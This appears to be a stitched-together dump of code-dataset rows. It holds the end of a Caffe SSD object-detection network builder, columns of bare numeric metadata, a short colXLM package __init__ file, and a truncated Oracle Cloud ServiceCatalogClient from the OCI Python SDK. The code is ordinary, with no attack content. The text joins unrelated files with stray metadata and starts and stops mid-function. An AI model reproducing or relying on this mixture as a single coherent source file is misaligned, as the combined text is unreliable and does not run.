'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_2_conf_reshape"
net[reshape_name] = L.Reshape(mbox_2_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
softmax_name = "mbox_2_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_2_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_2_layers[1] = net[flatten_name]
elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_2_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
mbox_2_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_2.get("num_classes",2),
'target_labels': ssd_Param_2.get('detout_target_labels',[]),
'alias_id':ssd_Param_2.get("alias_id",0),
'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_2.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_2 = L.DetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# EVAL in TEST MODE
if not train:
det_eval_param = {
'gt_labels': eval_Param.get('eval_gt_labels',[]),
'num_classes':eval_Param.get("eval_num_classes",2),
'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
'background_label_id':0,
}
net.det_accu = L.DetEval(net['detection_out_2'], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
return net
| 60.90966
| 151
| 0.606341
| 8,702
| 68,097
| 4.325557
| 0.034245
| 0.090115
| 0.058341
| 0.077788
| 0.946654
| 0.93786
| 0.934593
| 0.933052
| 0.929651
| 0.929651
| 0
| 0.032313
| 0.270144
| 68,097
| 1,117
| 152
| 60.96419
| 0.725036
| 0.01887
| 0
| 0.87109
| 0
| 0
| 0.236551
| 0.090688
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.018009
| null | null | 0.001896
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d67b97c686dad31eb36f8510c9145ccf54a95f1
| 232
|
py
|
Python
|
colXLM/modeling/tokenization/__init__.py
|
hannawong/ColXLM
|
56cb7fdd11244b8355d2181c668ee13edfcff457
|
[
"MIT"
] | 115
|
2021-11-10T00:14:29.000Z
|
2022-03-15T02:57:16.000Z
|
colXLM/modeling/tokenization/__init__.py
|
hannawong/ColXLM
|
56cb7fdd11244b8355d2181c668ee13edfcff457
|
[
"MIT"
] | null | null | null |
colXLM/modeling/tokenization/__init__.py
|
hannawong/ColXLM
|
56cb7fdd11244b8355d2181c668ee13edfcff457
|
[
"MIT"
] | 16
|
2021-11-12T02:46:11.000Z
|
2021-12-04T15:53:27.000Z
|
from colXLM.modeling.tokenization.query_tokenization import *
from colXLM.modeling.tokenization.doc_tokenization import *
from colXLM.modeling.tokenization.utils import tensorize_triples,tensorize_triples_qlm,tensorize_triples_prop
| 58
| 109
| 0.892241
| 28
| 232
| 7.142857
| 0.428571
| 0.15
| 0.27
| 0.45
| 0.48
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051724
| 232
| 3
| 110
| 77.333333
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3d9a5d7ae8f3136399072dd719883286319d747b
| 132,132
|
py
|
Python
|
src/oci/service_catalog/service_catalog_client.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 3
|
2020-09-10T22:09:45.000Z
|
2021-12-24T17:00:07.000Z
|
src/oci/service_catalog/service_catalog_client.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/service_catalog/service_catalog_client.py
|
ezequielramos/oci-python-sdk
|
cc4235cf217beaf9feed75760e9ce82610222762
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from oci._vendor import requests # noqa: F401
from oci._vendor import six
from oci import retry, circuit_breaker # noqa: F401
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
from .models import service_catalog_type_mapping
missing = Sentinel("Missing")
class ServiceCatalogClient(object):
"""
Manage solutions in Oracle Cloud Infrastructure Service Catalog.
"""
def __init__(self, config, **kwargs):
    """
    Create a new ServiceCatalogClient.

    :param dict config:
        Configuration keys and values as per `SDK and Tool Configuration <https://docs.cloud.oracle.com/Content/API/Concepts/sdkconfig.htm>`__.
        Use :py:meth:`~oci.config.from_file` to load one from disk, or pass a
        plain ``dict`` and validate it with :py:meth:`~oci.config.validate_config`.

    :param str service_endpoint: (optional)
        Endpoint to call, e.g. ``https://iaas.us-ashburn-1.oraclecloud.com``.
        If omitted it is derived from the region in *config*; supply it only
        when you need an explicit endpoint.

    :param timeout: (optional)
        Connection/read timeouts for the client (defaults: 10s connect, 60s
        read). A single float applies to both; a 2-tuple is
        ``(connect, read)``.
    :type timeout: float or tuple(float, float)

    :param signer: (optional)
        Signer used for requests; defaults to a :py:class:`~oci.signer.Signer`
        built from *config*. Pass e.g. an
        :py:class:`~oci.auth.signers.InstancePrincipalsSecurityTokenSigner`
        for Instance Principals authentication.
    :type signer: :py:class:`~oci.signer.AbstractBaseSigner`

    :param obj retry_strategy: (optional)
        Client-level retry strategy from :py:mod:`~oci.retry` (none by
        default); an operation-level ``retry_strategy`` kwarg overrides it.

    :param obj circuit_breaker_strategy: (optional)
        Client-level circuit breaker; defaults to
        :py:data:`~oci.circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY`.

    :param function circuit_breaker_callback: (optional)
        Callback invoked with any exception the circuit breaker raises.
    """
    validate_config(config, signer=kwargs.get('signer'))

    # Signer precedence: explicit kwarg > auth type declared in config >
    # API-key signer assembled from the config values.
    if 'signer' in kwargs:
        signer = kwargs['signer']
    elif AUTHENTICATION_TYPE_FIELD_NAME in config:
        signer = get_signer_from_authentication_type(config)
    else:
        signer = Signer(
            tenancy=config["tenancy"],
            user=config["user"],
            fingerprint=config["fingerprint"],
            private_key_file_location=config.get("key_file"),
            pass_phrase=get_config_value_or_default(config, "pass_phrase"),
            private_key_content=config.get("key_content")
        )

    client_kwargs = {
        'regional_client': True,
        'service_endpoint': kwargs.get('service_endpoint'),
        'base_path': '/20210527',
        'service_endpoint_template': 'https://service-catalog.{region}.oci.{secondLevelDomain}',
        'skip_deserialization': kwargs.get('skip_deserialization', False),
        'circuit_breaker_strategy': kwargs.get('circuit_breaker_strategy', circuit_breaker.GLOBAL_CIRCUIT_BREAKER_STRATEGY)
    }
    if 'timeout' in kwargs:
        client_kwargs['timeout'] = kwargs.get('timeout')
    if client_kwargs.get('circuit_breaker_strategy') is None:
        # Caller explicitly passed None: substitute the SDK default breaker.
        client_kwargs['circuit_breaker_strategy'] = circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY

    self.base_client = BaseClient("service_catalog", config, signer, service_catalog_type_mapping, **client_kwargs)
    self.retry_strategy = kwargs.get('retry_strategy')
    self.circuit_breaker_callback = kwargs.get('circuit_breaker_callback')
def bulk_replace_service_catalog_associations(self, service_catalog_id, bulk_replace_service_catalog_associations_details, **kwargs):
    """
    Replace all associations of a given service catalog in one bulk transaction.

    :param str service_catalog_id: (required)
        The unique identifier for the service catalog.

    :param oci.service_catalog.models.BulkReplaceServiceCatalogAssociationsDetails bulk_replace_service_catalog_associations_details: (required)
        Details of the service catalog update operation.

    :param str if_match: (optional)
        Optimistic-concurrency token: set to the etag from a prior GET/POST
        so the resource is modified only if it still matches.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier, useful when contacting
        Oracle about a particular request.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding any client-level strategy;
        pass :py:class:`~oci.retry.NoneRetryStrategy` to force no retries.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogs/{serviceCatalogId}/actions/bulkReplaceAssociations"
    method = "PUT"

    # Fail fast on keyword arguments this operation does not define.
    allowed_kwargs = ("retry_strategy", "if_match", "opc_request_id")
    unknown = [_key for _key in six.iterkeys(kwargs) if _key not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "bulk_replace_service_catalog_associations got unknown kwargs: {!r}".format(unknown))

    path_params = {"serviceCatalogId": service_catalog_id}
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Keep only headers the caller actually supplied.
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=bulk_replace_service_catalog_associations_details)

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def change_private_application_compartment(self, private_application_id, change_private_application_compartment_details, **kwargs):
    """
    Moves the specified private application from one compartment to another.

    :param str private_application_id: (required)
        The unique identifier for the private application.

    :param oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails change_private_application_compartment_details: (required)
        The details of the request to change the compartment of a given private application.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier, useful when contacting
        Oracle about a particular request.

    :param str if_match: (optional)
        Optimistic-concurrency token: set to the etag from a prior GET/POST
        so the resource is modified only if it still matches.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding any client-level strategy;
        pass :py:class:`~oci.retry.NoneRetryStrategy` to force no retries.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplications/{privateApplicationId}/actions/changeCompartment"
    method = "POST"

    # Fail fast on keyword arguments this operation does not define.
    allowed_kwargs = ("retry_strategy", "opc_request_id", "if_match")
    unknown = [_key for _key in six.iterkeys(kwargs) if _key not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "change_private_application_compartment got unknown kwargs: {!r}".format(unknown))

    path_params = {"privateApplicationId": private_application_id}
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    # Keep only headers the caller actually supplied.
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=change_private_application_compartment_details)

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def change_service_catalog_compartment(self, service_catalog_id, change_service_catalog_compartment_details, **kwargs):
    """
    Moves the specified service catalog from one compartment to another.

    :param str service_catalog_id: (required)
        The unique identifier for the service catalog.

    :param oci.service_catalog.models.ChangeServiceCatalogCompartmentDetails change_service_catalog_compartment_details: (required)
        The details of the request to change the compartment of a given service catalog.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier, useful when contacting
        Oracle about a particular request.

    :param str if_match: (optional)
        Optimistic-concurrency token: set to the etag from a prior GET/POST
        so the resource is modified only if it still matches.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding any client-level strategy;
        pass :py:class:`~oci.retry.NoneRetryStrategy` to force no retries.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogs/{serviceCatalogId}/actions/changeCompartment"
    method = "POST"

    # Fail fast on keyword arguments this operation does not define.
    allowed_kwargs = ("retry_strategy", "opc_request_id", "if_match")
    unknown = [_key for _key in six.iterkeys(kwargs) if _key not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "change_service_catalog_compartment got unknown kwargs: {!r}".format(unknown))

    path_params = {"serviceCatalogId": service_catalog_id}
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    # Keep only headers the caller actually supplied.
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=change_service_catalog_compartment_details)

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def create_private_application(self, create_private_application_details, **kwargs):
    """
    Creates a private application along with a single package to be hosted.

    :param oci.service_catalog.models.CreatePrivateApplicationDetails create_private_application_details: (required)
        Private application creation details.

    :param str opc_retry_token: (optional)
        Token that makes the request safely retryable after a timeout or
        server error; tokens expire after 24 hours or on conflicting
        operations.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier, useful when contacting
        Oracle about a particular request.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding any client-level strategy;
        pass :py:class:`~oci.retry.NoneRetryStrategy` to force no retries.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplication`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplications"
    method = "POST"

    # Fail fast on keyword arguments this operation does not define.
    allowed_kwargs = ("retry_strategy", "opc_retry_token", "opc_request_id")
    unknown = [_key for _key in six.iterkeys(kwargs) if _key not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "create_private_application got unknown kwargs: {!r}".format(unknown))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Keep only headers the caller actually supplied.
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        header_params=header_params,
        body=create_private_application_details,
        response_type="PrivateApplication")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Auto-generate an idempotency token when the caller omitted one.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def create_service_catalog(self, create_service_catalog_details, **kwargs):
    """
    Creates a brand new service catalog in a given compartment.

    :param oci.service_catalog.models.CreateServiceCatalogDetails create_service_catalog_details: (required)
        The details for creating a service catalog.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried in case of a timeout or
        server error without risk of executing that same action again. Retry tokens expire after
        24 hours, but can be invalidated before then by conflicting operations.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request, to quote when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at
        the client level. Should be one of the strategies from the :py:mod:`~oci.retry` module;
        pass an instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalog`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogs"
    method = "POST"

    # Reject any keyword argument this operation does not recognize.
    allowed = ("retry_strategy", "opc_retry_token", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "create_service_catalog got unknown kwargs: {!r}".format(unknown))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop optional headers the caller did not supply.
    headers = {k: v for (k, v) in six.iteritems(headers) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            header_params=headers,
            body=create_service_catalog_details,
            response_type="ServiceCatalog")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(headers)
        self.base_client.add_opc_client_retries_header(headers)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        header_params=headers,
        body=create_service_catalog_details,
        response_type="ServiceCatalog")
def create_service_catalog_association(self, create_service_catalog_association_details, **kwargs):
    """
    Creates an association between service catalog and a resource.

    :param oci.service_catalog.models.CreateServiceCatalogAssociationDetails create_service_catalog_association_details: (required)
        The details for creating the association between resource and service catalog.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried in case of a timeout or
        server error without risk of executing that same action again. Retry tokens expire after
        24 hours, but can be invalidated before then by conflicting operations.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request, to quote when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at
        the client level. Should be one of the strategies from the :py:mod:`~oci.retry` module;
        pass an instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalogAssociation`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogAssociations"
    method = "POST"

    # Reject any keyword argument this operation does not recognize.
    allowed = ("retry_strategy", "opc_retry_token", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "create_service_catalog_association got unknown kwargs: {!r}".format(unknown))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop optional headers the caller did not supply.
    headers = {k: v for (k, v) in six.iteritems(headers) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            header_params=headers,
            body=create_service_catalog_association_details,
            response_type="ServiceCatalogAssociation")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(headers)
        self.base_client.add_opc_client_retries_header(headers)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        header_params=headers,
        body=create_service_catalog_association_details,
        response_type="ServiceCatalogAssociation")
def delete_private_application(self, private_application_id, **kwargs):
    """
    Deletes an existing private application.

    :param str private_application_id: (required)
        The unique identifier for the private application.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag from a previous GET or POST response
        for this resource. The delete proceeds only if the etag matches the resource's current
        etag value.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request, to quote when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at
        the client level. Should be one of the strategies from the :py:mod:`~oci.retry` module;
        pass an instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplications/{privateApplicationId}"
    method = "DELETE"

    # Reject any keyword argument this operation does not recognize.
    allowed = ("retry_strategy", "if_match", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "delete_private_application got unknown kwargs: {!r}".format(unknown))

    path_params = {"privateApplicationId": private_application_id}
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    # Path parameters must be present and non-blank to build a valid URL.
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and len(value.strip()) == 0
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop optional headers the caller did not supply.
    headers = {k: v for (k, v) in six.iteritems(headers) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=headers)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=headers)
def delete_service_catalog(self, service_catalog_id, **kwargs):
    """
    Deletes the specified service catalog from the compartment.

    :param str service_catalog_id: (required)
        The unique identifier for the service catalog.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag from a previous GET or POST response
        for this resource. The delete proceeds only if the etag matches the resource's current
        etag value.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request, to quote when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at
        the client level. Should be one of the strategies from the :py:mod:`~oci.retry` module;
        pass an instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogs/{serviceCatalogId}"
    method = "DELETE"

    # Reject any keyword argument this operation does not recognize.
    allowed = ("retry_strategy", "if_match", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "delete_service_catalog got unknown kwargs: {!r}".format(unknown))

    path_params = {"serviceCatalogId": service_catalog_id}
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    # Path parameters must be present and non-blank to build a valid URL.
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and len(value.strip()) == 0
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop optional headers the caller did not supply.
    headers = {k: v for (k, v) in six.iteritems(headers) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=headers)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=headers)
def delete_service_catalog_association(self, service_catalog_association_id, **kwargs):
    """
    Removes an association between service catalog and a resource.

    :param str service_catalog_association_id: (required)
        The unique identifier of the service catalog association.

    :param str if_match: (optional)
        For optimistic concurrency control: set to the etag from a previous GET or POST response
        for this resource. The delete proceeds only if the etag matches the resource's current
        etag value.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request, to quote when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at
        the client level. Should be one of the strategies from the :py:mod:`~oci.retry` module;
        pass an instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogAssociations/{serviceCatalogAssociationId}"
    method = "DELETE"

    # Reject any keyword argument this operation does not recognize.
    allowed = ("retry_strategy", "if_match", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "delete_service_catalog_association got unknown kwargs: {!r}".format(unknown))

    path_params = {"serviceCatalogAssociationId": service_catalog_association_id}
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    # Path parameters must be present and non-blank to build a valid URL.
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and len(value.strip()) == 0
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "if-match": kwargs.get("if_match", missing),
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop optional headers the caller did not supply.
